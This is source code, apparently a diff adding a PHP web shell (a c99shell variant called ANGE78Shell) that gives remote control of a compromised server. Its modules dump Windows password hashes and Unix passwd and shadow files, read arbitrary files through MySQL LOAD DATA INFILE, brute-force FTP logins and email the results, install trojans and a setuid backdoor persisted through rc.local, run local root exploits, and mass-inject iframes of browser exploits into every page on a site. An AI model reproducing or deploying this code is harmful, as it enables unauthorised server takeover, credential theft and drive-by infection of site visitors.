if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($h); +} +} +if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} +//Sending headers +@ob_start(); +@ob_implicit_flush(0); +function onphpshutdown() +{ + global $gzipencode,$ft; + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) + { + $v = @ob_get_contents(); + @ob_end_clean(); + @ob_start("ob_gzHandler"); + echo $v; + @ob_end_flush(); + } +} +function c99shexit() +{ + onphpshutdown(); + exit; +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", FALSE); +header("Pragma: no-cache"); +if (empty($tmpdir)) +{ + $tmpdir = ini_get("upload_tmp_dir"); + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} +} +$tmpdir = realpath($tmpdir); +$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); +if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} +if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} +else {$tmpdir_logs = realpath($tmpdir_logs);} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = TRUE; + $hsafemode = "ON (secure)"; +} +else {$safemode = FALSE; $hsafemode = "OFF (not secure)";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "".$v."";} +else {$openbasedir = FALSE; $hopenbasedir = "OFF (not secure)";} +$sort = htmlspecialchars($sort); +if (empty($sort)) {$sort = $sort_default;} +$sort[1] = strtolower($sort[1]); +$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); +if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",htmlspecialchars($DISP_SERVER_SOFTWARE)); +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string",$highlight_string); //#DD0000 +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +// took the disabled functions from r57shell +?><?php echo getenv("HTTP_HOST"); ?> - ANGE78Shell

+ + + + +'; +?> +
Kernel: ',1); if($win) echo ' ('.exec('ver').')'; ?>Safe-Mode:
',1);} else {echo 'Running As: '.get_current_user();} ?>Disabled PHP Functions: NONE';}else{echo '$df';} ?>
Free '.view_size($free).' of '.view_size($total).' ('.$free_percent.'%)'; +} +echo 'Server IP: '.gethostbyname($_SERVER["HTTP_HOST"]).' - Your IP: '.$_SERVER["REMOTE_ADDR"].'
+
+

'.htmlspecialchars($b).DIRECTORY_SEPARATOR.''; + $i++; +} +echo '   '; +if (is_writable($d)) +{ + $wd = TRUE; + $wdt = "[ ok ]"; + echo "".view_perms(fileperms($d)).""; +} +else +{ + $wd = FALSE; + $wdt = "[ Read-Only ]"; + echo ''.view_perms_color($d).''; +} + +echo '
'; +$letters = ''; +if ($win) +{ + $v = explode("\\",$d); + $v = $v[0]; + foreach (range('a','z') as $letter) + { + $bool = $isdiskette = in_array($letter,$safemode_diskettes); + if (!$bool) {$bool = is_dir($letter.":\\");} + if ($bool) + { + $letters .= "["; + if ($letter.":" != $v) {$letters .= strtoupper($letter);} + else {$letters .= ''.strtoupper($letter).'';} + $letters .= ":] "; + } + } + if (!empty($letters)) {echo "Detected drives: ".$letters."
";} +} +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "".$item[0]."    "; + } +} +if (count($quicklaunch2) > 0) +{ +echo '
'; + foreach($quicklaunch2 as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "".$item[0]."    "; + } +} + +echo "


"; +if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "
".$donated_html."

";} +echo "
"; +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?>

Attention! SQL-Manager is NOT ready module! Don't reports bugs.

"; + if (!$sql_sock) {?>"; + } + echo "
SQL Manager:
"; + if (!$sql_sock) + { + + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "
Can't connect
"; echo "".$err."";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "
MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
"; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
"; + } + echo "
  • If login is null, login is owner of process.
  • If host is null, host is localhost (default).
  • If port is null, port is 3306 (default).
  •  Please, fill the form:
    UsernamePasswordDatabase
    HostPort
    ">Home
    ".htmlspecialchars($sql_db)." ]---
    "; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "".htmlspecialchars($row[0])." (".$count_row[0].")
    "; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?>
    Home

    Please, select database
    "; + //Start center panel + $diplay = TRUE; + if ($sql_db) + { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "
    There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
    "; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "
    "; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "



     
    ";} + } + if (in_array($sql_act,$acts)) + { + ?>
    Create new table:
     
    Dump DB:
    "> 
    ";} + if ($sql_act == "newtbl") + { + + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    "; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = FALSE; + echo "
    SQL-Dump:

    "; + echo "DB: 

    "; + $v = join (";",$dmptbls); + echo "Only tables (explode \";\") 1: 

    "; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "File: 

    "; + echo "Download:  

    "; + echo "Save to file:  "; + echo "



    1 - all, if empty"; + echo "
    "; + } + else + { + $diplay = TRUE; + $set = array(); + $set["sock"] = $sql_sock; + $set["db"] = $sql_db; + $dump_out = "download"; + $set["print"] = 0; + $set["nl2br"] = 0; + $set[""] = 0; + $set["file"] = $dump_file; + $set["add_drop"] = TRUE; + $set["onlytabs"] = array(); + if (!empty($dmptbls)) {$set["onlytabs"] = explode(";",$dmptbls);} + $ret = mysql_dump($set); + if ($sql_dump_download) + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".strlen($ret)); + header("Content-disposition: attachment; filename=\"".basename($sql_dump_file)."\";"); + echo $ret; + exit; + } + elseif ($sql_dump_savetofile) + { + $fp = fopen($sql_dump_file,"w"); + if (!$fp) {echo "Dump error! Can't write to \"".htmlspecialchars($sql_dump_file)."\"!";} + else + { + fwrite($fp,$ret); + fclose($fp); + echo "Dumped! Dump has been writed to \"".htmlspecialchars(realpath($sql_dump_file))."\" (".view_size(filesize($sql_dump_file)).")."; + } + } + else {echo "Dump: nothing to do!";} + } + } + if ($diplay) + { + if (!empty($sql_tbl)) + { + if (empty($sql_tbl_act)) {$sql_tbl_act = "browse";} + $count = mysql_query("SELECT COUNT(*) FROM `".$sql_tbl."`;"); + $count_row = mysql_fetch_array($count); + mysql_free_result($count); + $tbl_struct_result = mysql_query("SHOW FIELDS FROM `".$sql_tbl."`;"); + $tbl_struct_fields = array(); + while ($row = mysql_fetch_assoc($tbl_struct_result)) {$tbl_struct_fields[] = $row;} + if ($sql_ls > $sql_le) {$sql_le = $sql_ls + $perpage;} + if (empty($sql_tbl_page)) {$sql_tbl_page = 0;} + if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;} + if (empty($sql_tbl_le)) {$sql_tbl_le = 30;} + $perpage = $sql_tbl_le - $sql_tbl_ls; + if (!is_numeric($perpage)) {$perpage = 10;} + $numpages = $count_row[0]/$perpage; + $e = explode(" ",$sql_order); + if (count($e) == 2) + { + if ($e[0] == "d") {$asc_desc = "DESC";} + else {$asc_desc = "ASC";} + $v = "ORDER BY `".$e[1]."` ".$asc_desc." "; + } + else {$v = "";} + $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage.""; + $result = mysql_query($query) or print(mysql_smarterror()); + echo "
    Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)
    "; + echo "Structure ]   "; + echo "Browse ]   "; + echo "Dump ]   "; + echo "Insert ]   "; + if ($sql_tbl_act == "structure") {echo "

    Coming sooon!";} + if ($sql_tbl_act == "insert") + { + if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();} + if (!empty($sql_tbl_insert_radio)) + { + + } + else + { + echo "

    Inserting row into table:
    "; + if (!empty($sql_tbl_insert_q)) + { + $sql_query = "SELECT * FROM `".$sql_tbl."`"; + $sql_query .= " WHERE".$sql_tbl_insert_q; + $sql_query .= " LIMIT 1;"; + $result = mysql_query($sql_query,$sql_sock) or print("

    ".mysql_smarterror()); + $values = mysql_fetch_assoc($result); + mysql_free_result($result); + } + else {$values = array();} + echo "
    "; + foreach ($tbl_struct_fields as $field) + { + $name = $field["Field"]; + if (empty($sql_tbl_insert_q)) {$v = "";} + echo ""; + $i++; + } + echo "
    FieldTypeFunctionValue
    ".htmlspecialchars($name)."".$field["Type"]."

    "; + echo "Insert as new row"; + if (!empty($sql_tbl_insert_q)) {echo " or Save"; echo "";} + echo "

    "; + } + } + if ($sql_tbl_act == "browse") + { + $sql_tbl_ls = abs($sql_tbl_ls); + $sql_tbl_le = abs($sql_tbl_le); + echo "
    "; + echo "\"Pages\" "; + $b = 0; + for($i=0;$i<$numpages;$i++) + { + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + echo $i; + if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "";} + if (($i/30 == round($i/30)) and ($i > 0)) {echo "
    ";} + else {echo " ";} + } + if ($i == 0) {echo "empty";} + echo "
    From:  To:  
    "; + echo "
    "; + echo ""; + echo ""; + for ($i=0;$i"; + if (empty($e[0])) {$e[0] = "a";} + if ($e[1] != $v) {echo "".$v."";} + else {echo "".$v."\"".$m."\"";} + echo ""; + } + echo ""; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + echo ""; + $w = ""; + $i = 0; + foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} + if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} + echo ""; + $i = 0; + foreach ($row as $k=>$v) + { + $v = htmlspecialchars($v); + if ($v == "") {$v = "NULL";} + echo ""; + $i++; + } + echo ""; + echo ""; + } + mysql_free_result($result); + echo "
    Action
    ".$v.""; + echo "\"Delete\" "; + echo "\"Edit\" "; + echo "

     

    "; + } + } + else + { + $result = mysql_query("SHOW TABLE STATUS", $sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + echo "
    "; + $i = 0; + $tsize = $trows = 0; + while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) + { + $tsize += $row["Data_length"]; + $trows += $row["Rows"]; + $size = view_size($row["Data_length"]); + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + $i++; + } + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo ""; + echo "
    Table
    RowsTypeCreatedModifiedSizeAction
     ".$row["Name"]." ".$row["Rows"]."".$row["Type"]."".$row["Create_time"]."".$row["Update_time"]."".$size." \"Empty\"  \"Drop\" \"Insert\" 
    +
    ".$i." table(s)
    ".$trows."".$row[1]."".$row[10]."".$row[11]."".view_size($tsize)."

     

    "; + mysql_free_result($result); + } + } + } + } + } + else + { + $acts = array("","newdb","serverstatus","servervars","processes","getfile"); + if (in_array($sql_act,$acts)) {?>
    Create new DB:
     
    View File:
     
    "; + if ($sql_act == "newdb") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    ";} + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason:
    ".mysql_smarterror();} + } + if ($sql_act == "serverstatus") + { + $result = mysql_query("SHOW STATUS", $sql_sock); + echo "
    Server-status variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "servervars") + { + $result = mysql_query("SHOW VARIABLES", $sql_sock); + echo "
    Server variables:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";} + echo "
    NameValue
    ".$row[0]."".$row[1]."
    "; + mysql_free_result($result); + } + if ($sql_act == "processes") + { + if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";} + $result = mysql_query("SHOW PROCESSLIST", $sql_sock); + echo "
    Processes:

    "; + echo ""; + while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";} + echo "
    IDUSERHOSTDBCOMMANDTIMESTATEINFOAction
    ".$row[0]."".$row[1]."".$row[2]."".$row[3]."".$row[4]."".$row[5]."".$row[6]."".$row[7]."Kill
    "; + mysql_free_result($result); + } + if ($sql_act == "getfile") + { + $tmpdb = $sql_login."_tmpdb"; + $select = mysql_select_db($tmpdb); + if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} + if ($select) + { + $created = FALSE; + mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); + mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); + $result = mysql_query("SELECT * FROM tmp_file;"); + if (!$result) {echo "Error in reading file (permision denied)!";} + else + { + for ($i=0;$iFile \"".$sql_getfile."\" does not exists or empty!
    ";} + else {echo "File \"".$sql_getfile."\":
    ".nl2br(htmlspecialchars($f))."
    ";} + mysql_free_result($result); + mysql_query("DROP TABLE tmp_file;"); + } + } + mysql_drop_db($tmpdb); //comment it if you want to leave database + } + } + } + } + echo "
    "; + if ($sql_sock) + { + $affected = @mysql_affected_rows($sql_sock); + if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} + echo "
    Affected rows: ".$affected."
    "; +} +if ($act == 'grablogins') { + if ($win) { + echo 'Grab Windows Logins:

    '; + if (file_exists($_SERVER['WINDIR'])) { + echo 'Download backup SAM file: '.$_SERVER['WINDIR'].'\repair\SAM

    '; + } else { + echo 'There\'s no backup SAM file!'; + } + echo 'Execute SAMDUMP

    '; + if ($_GET['dumphashes'] == 'samdump') { + if (is_writable('.')) { + cf('samdump.exe', $samdump); + exec('samdump.exe '.$_SERVER['WINDIR'].'\repair\sam', $blah); + echo '

    '; + if (file_exists('samdump.exe')) + unlink('samdump.exe'); + }else{ + echo 'Directory Is Not Writable!
    '; + } + } // end if samdump was called + echo 'Execute PWDUMP2

    '; + if ($_GET['dumphashes'] == 'pwdump2') { + if (is_writable('.')) { + cf('pwdump2.exe', $pwdump2); + cf('samdump.dll', $samdumpdll); + exec('pwdump2.exe', $blah); + echo '

    '; + if (file_exists('pwdump2.exe')) + unlink('pwdump2.exe'); + if (file_exists('samdump.dll')) + unlink('samdump.dll'); + }else{ + echo 'Directory Is Not Writable!
    '; + } + } // end if pwdump2 was called + + } else { // if not windows + echo 'Grab *nix Logins:

    '; + if (file_exists('/etc/passwd')) + echo 'Download passwd: /etc/passwd'; + if (file_exists('/etc/master.passwd')) + echo 'Download master.passwd: /etc/master.passwd <- 1% chance you can view this'; + if (file_exists('/etc/shadow')) + echo 'Download shadow: /etc/shadow <- 1% chance you can view this'; + } +} +if ($act == "mkdir") +{ + if ($mkdir != $d) + { + if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} + elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";} + echo "

    "; + } + $act = $dspact = "ls"; +} +if ($act == "ftpquickbrute") +{ + echo "Ftp Quick brute:
    "; + if (!win) {echo "This function does not work in Windows!

    ";} + else + { + function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) + { + if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} + else {$TRUE = TRUE;} + if ($TRUE) + { + $sock = @ftp_connect($host,$port,$timeout); + if (@ftp_login($sock,$login,$pass)) + { + echo "
    Connected to ".$host." with login \"".$login."\" and password \"".$pass."\".
    "; + ob_flush(); + return TRUE; + } + } + } + if (!empty($submit)) + { + if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} + $fp = fopen("/etc/passwd","r"); + if (!$fp) {echo "Can't get /etc/passwd for password-list.";} + else + { + if ($fqb_logging) + { + if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} + else {$fqb_logfp = FALSE;} + $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; + if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + } + ob_flush(); + $i = $success = 0; + $ftpquick_st = getmicrotime(); + while(!feof($fp)) + { + $str = explode(":",fgets($fp,2048)); + if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) + { + echo "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"
    "; + $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + $success++; + ob_flush(); + } + if ($i > $fqb_lenght) {break;} + $i++; + } + if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} + $ftpquick_t = round(getmicrotime()-$ftpquick_st,4); + echo "
    Done!
    Total time (secs.): ".$ftpquick_t."
    Total connections: ".$i."
    Success.: ".$success."
    Unsuccess.:".($i-$success)."
    Connects per second: ".round($i/$ftpquick_t,2)."
    "; + $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; + if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} + if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);} + fclose($fqb_logfp); + } + } + else + { + $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; + $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); + echo "

    Read first:

    Users only with shell? 

    Logging? 
    Logging to file? 
    Logging to e-mail? 

    "; + } + } +} +if ($act == 'd') +{ + if (!is_dir($d)) {echo "
    Permision denied!
    ";} + else + { + echo "Directory information:"; + if (!$win) + { + echo "
    Owner/Group "; + $ow = posix_getpwuid(fileowner($d)); + $gr = posix_getgrgid(filegroup($d)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); + } + echo "
    Perms".view_perms_color($d)."
    Create time ".date("d/m/Y H:i:s",filectime($d))."
    Access time ".date("d/m/Y H:i:s",fileatime($d))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d))."

    "; + } +} +if ($act == 'phpinfo') {@ob_clean(); phpinfo(); c99shexit();} + +if ($act == 'trojan') { +echo 'Install Trojan Server:

    '; + if ($win) { + echo 'Please keep in mind that these are not undetectable trojans. Any decent anti-virus will pick them up, and they take no action to bypass firewalls or routers. Use at your own risk.

    '; +?> +
    +Choose Trojan: + + +
    +'; + }else{ + echo 'Directory Is Not Writable!
    '; + } + } // end if beast was called +} else { // if not windows +?> +Install Backdoor:

    +
    +Choose Backdoor: + + +
    +
       # ./backhole &
    +   i.e. # mv backhole /some/path/fakemail
    +        # chmod 4770 /path/to/fakemail
    +        # echo "/path/to/fakemail &" >> /etc/rc.d/rc.local
    +        # /path/to/fakemail &
    Blackhole is configured to run under the process name \'apache\' on port 6875.
    '; + }else{ + echo 'Directory Is Not Writable!
    '; + } + } // end if beast was called + + + } // end if windows/unix +} // end if trojan was called + +if ($act == 'exploits') { +?> +Exploits: +

    +All exploits are pre-compiled. Just follow the directions. +

    +h00lyshit - Local Race Exploit +".'); + }else{ + echo 'Directory Is Not Writable!
    '; + } + } // end if h00lyshit was called +?> +

    +raptor_chown - Group Modification Exploit +".'); + }else{ + echo 'Directory Is Not Writable!
    '; + } + } // end if raptor_chown was called + + +} // end if exploits is called +if ($act == 'massbrowsersploit') { +?> +Mass Code Injection:

    +Use this to add HTML to the end of every .php, .htm, and .html page in the directory specified.

    +
    + + + + + + +
    Dir to inject: <-- default is dir this shell is in
    Code to inject: <-- best bet would be to include an invisible iframe of browser exploits
    +
    +'; + } else { + echo 'failed to inject '.$injectj00.''; + } + } + foreach (glob($_GET['pathtomass']."/*.htm") as $injectj00) { + $fp=fopen($injectj00,"a+"); + if (fputs($fp,$lolinject)){ + echo $injectj00.' was injected
    '; + } else { + echo 'failed to inject '.$injectj00.''; + } + } + foreach (glob($_GET['pathtomass']."/*.html") as $injectj00) { + $fp=fopen($injectj00,"a+"); + if (fputs($fp,$lolinject)){ + echo $injectj00.' was injected
    '; + } else { + echo 'failed to inject '.$injectj00.''; + } + } + } else { //end if inputted dir is real -- if not, show an ugly red error + echo ''.$_GET['pathtomass'].' is not available!'; + } // end if inputted dir is real, for real this time +} // end if confirmation to mass sploit is go +} // end if massbrowsersploit is called + +if ($act == 'security') +{ + echo "
    Server security information:
    Open base dir: ".$hopenbasedir."
    "; + if (!$win) + { + if ($nixpasswd) + { + if ($nixpasswd == 1) {$nixpasswd = 0;} + echo "*nix /etc/passwd:
    "; + if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} + if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} + echo "
    From:  To:  

    "; + $i = $nixpwd_s; + while ($i < $nixpwd_e) + { + $uid = posix_getpwuid($i); + if ($uid) + { + $uid["dir"] = "".$uid["dir"].""; + echo join(":",$uid)."
    "; + } + $i++; + } + } + else {echo "
    Get /etc/passwd
    ";} + if (file_get_contents("/etc/userdomains")) {echo "View cpanel user-domains logs
